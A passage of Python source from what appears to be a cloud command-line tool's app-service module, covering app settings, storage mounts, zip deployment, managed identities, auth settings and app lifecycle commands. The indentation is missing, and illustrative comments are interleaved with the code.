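#   validate_container_app_create_options(runtime='PYTHON|3.7')                    -> True
#   validate_container_app_create_options(deployment_container_image_name='nginx') -> True
#   validate_container_app_create_options(runtime='PYTHON|3.7',
#                                         deployment_container_image_name='nginx') -> False (two options given)
#   validate_container_app_create_options(multicontainer_config_type='COMPOSE')    -> False (config file missing)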
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
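# Illustrative examples (hypothetical image names, not part of the original module):
#   parse_docker_image_name('myregistry.azurecr.io/myapp:v1') -> 'myregistry.azurecr.io'
#   parse_docker_image_name('library/nginx')                  -> None (prefix has no '.' or ':', so no private registry)
#   parse_docker_image_name('nginx')                          -> None (no registry part at all)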
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like to accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
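# Illustrative usage (hypothetical values, not part of the original module): settings may be passed either
# as KEY=value pairs or as the JSON produced by the corresponding "list" command; entries supplied via
# slot_settings (or JSON entries carrying "slotSetting": true) are additionally recorded as slot-sticky names.
#   update_app_settings(cmd, 'my-rg', 'my-app', settings=['FOO=bar'])
#   update_app_settings(cmd, 'my-rg', 'my-app', slot_settings=['STICKY=1'], slot='staging')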
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because, when the plan is created as part of the function app,
# it can take a couple of tries before the plan becomes visible
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find an \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current / float(total)))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ex:
# This SDK function throws an error if Status Code is 200
if ex.status_code != 200:
raise ex
except DefaultErrorResponseException as ex:
if ex.response.status_code != 200:
raise ex
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
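# Illustrative resolution (not part of the original module): with slot='staging' and
# operation_name='update_application_settings', the helper picks
# client.web_apps.update_application_settings_slot and inserts the slot name before the remaining
# positional arguments; without a slot it calls the non-slot variant directly.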
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a helper method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
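# Illustrative note (hypothetical values, not part of the original module): the flags are expected as the
# strings 'true'/'false', hence the string comparisons above, e.g.
#   update_webapp(site, https_only='true')                # sets site.https_only = True
#   update_webapp(site, client_affinity_enabled='false')  # sets site.client_affinity_enabled = False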
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between Consumption and Elastic Premium plans.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
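# Illustrative examples (hypothetical identity ids, not part of the original module):
#   _build_identities_info(None)
#       -> ({'type': 'SystemAssigned'}, 'SystemAssigned', [], True)
#   _build_identities_info(['/subscriptions/xxx/.../userAssignedIdentities/my-id'])
#       -> type 'UserAssigned', with the resource id listed under 'userAssignedIdentities'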
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
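# Illustrative examples (not part of the original module):
#   is_auth_runtime_version_valid(None)     -> True   (nothing to validate)
#   is_auth_runtime_version_valid('~1')     -> True   (tilde followed by an integer)
#   is_auth_runtime_version_valid('1.2.3')  -> True   (exactly three numeric parts)
#   is_auth_runtime_version_valid('1.2')    -> False  (must be ~N or N.N.N)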
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is already used in azure.cli.core.commands,
# and there is no simple functional replacement for this deprecated method on Python 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
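# Illustrative example (hypothetical settings, not part of the original module): if the SCM site
# currently reports {'A': '1', 'B': '2'}, then
#   validate_app_settings_in_scm(cmd, rg, app, should_contain={'A': '1'}) -> True
#   validate_app_settings_in_scm(cmd, rg, app, should_not_have=['B'])     -> False
#   validate_app_settings_in_scm(cmd, rg, app, should_have=['A', 'C'])    -> False ('C' is missing)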
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
settings_url = '{}/api/settings'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
headers = {
'Content-Type': 'application/octet-stream',
'Cache-Control': 'no-cache',
'User-Agent': get_az_user_agent()
}
import requests
response = requests.get(settings_url, headers=headers, auth=(username, password), timeout=3)
return response.json() or {}
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p].value,
'type':result.properties[p].type,
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
